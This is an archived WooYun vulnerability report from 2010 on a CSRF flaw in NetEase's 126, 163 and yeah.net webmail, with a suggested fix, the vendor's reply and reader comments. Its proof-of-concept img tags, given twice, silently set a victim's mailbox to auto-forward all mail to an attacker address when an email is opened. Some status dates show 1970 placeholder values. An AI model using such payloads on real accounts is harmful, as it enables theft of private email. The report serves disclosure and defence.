破壳企业应急安全(防御方向)课程 应急响应 勒索病毒 挖矿木马 DDOS 日志分析

网易邮箱CSRF漏洞

编号18
Urlhttp://www.wooyun.org/bug.php?action=view&id=18
漏洞状态厂商已经确认
漏洞标题网易邮箱CSRF漏洞
漏洞类型CSRF
厂商网易
白帽子冰燃
提交日期2010-07-14 17:32:00
公开日期2010-08-18 16:37:00
修复时间(not set)
确认时间1970-01-01 00:00:00
Confirm Spend-1
漏洞标签
关注数0
收藏数0
白帽评级
白帽自评rank20
厂商评级
厂商评rank12
漏洞简介
网易邮箱存在CSRF漏洞,成功攻击可能导致用户数据被窃取。
漏洞细节

网易126邮箱存在CSRF漏洞,攻击者只需要构造一个邮件发给126用户的邮箱,在邮件按里嵌入一个图片,被攻击用户只要打开了该邮件,邮箱就会被设置自动转发给攻击者邮箱。
<img src="http://config.mail.126.com/autofw/fw[email protected]&keeplocal=1&callback=MM.autofwd.valCallback" />
<img src="http://config.mail.163.com/autofw/[email protected]&keeplocal=1&callback=MM.autofwd.valCallback" />
<img src="http://config.mail.yeah.net/autofw/[email protected]&keeplocal=1&callback=MM.autofwd.valCallback" />

POC

<img src="http://config.mail.126.com/autofw/[email protected]&keeplocal=1&callback=MM.autofwd.valCallback" />
<img src="http://config.mail.163.com/autofw/[email protected]&keeplocal=1&callback=MM.autofwd.valCallback" />
<img src="http://config.mail.yeah.net/autofw/[email protected]&keeplocal=1&callback=MM.autofwd.valCallback" />

修复方案

1.建议添加CSRF Token.
2.修改提交方式GET为POST.

状态信息 2010-07-14: 细节已通知厂商并且等待厂商处理中
1970-01-01: 厂商已经确认,细节仅向厂商公开
1970-01-11: 细节向核心白帽子及相关领域专家公开
1970-01-21: 细节向普通白帽子公开
1970-01-31: 细节向实习白帽子公开
2010-08-18: 细节向公众公开
厂商回复感谢冰燃,请发地址到我们的邮箱,礼物奉上。
回应信息危害等级:高漏洞Rank:12 确认时间:2010-07-14 17:32
Showing 1-7 of 7 items.
评论内容评论人点赞数评论时间

每年都有人回复么?

crown丶prince02015-07-24 09:55:00

这个不错。。不过现在肯定不行了

px162402014-11-17 09:20:00

好思路赞一个

木马游民02014-07-15 14:14:00

mark

he1renyagao02014-07-02 10:45:00

1970-01-31: 细节向实习白帽子公开2010-08-18: 细节向公众公开-----------我等实习白帽屁民都在穿越中......

神倦懒言02013-06-08 18:04:00

nice

Stream02012-11-07 12:51:00

1970-01-01: 厂商已经确认,细节仅向厂商公开1970-01-11: 细节向核心白帽子及相关领域专家公开1970-01-21: 细节向普通白帽子公开1970-01-31: 细节向实习白帽子公开1970-02-15: 细节向公众公开难道我眼花了。。

NiceWorm02012-09-13 08:54:00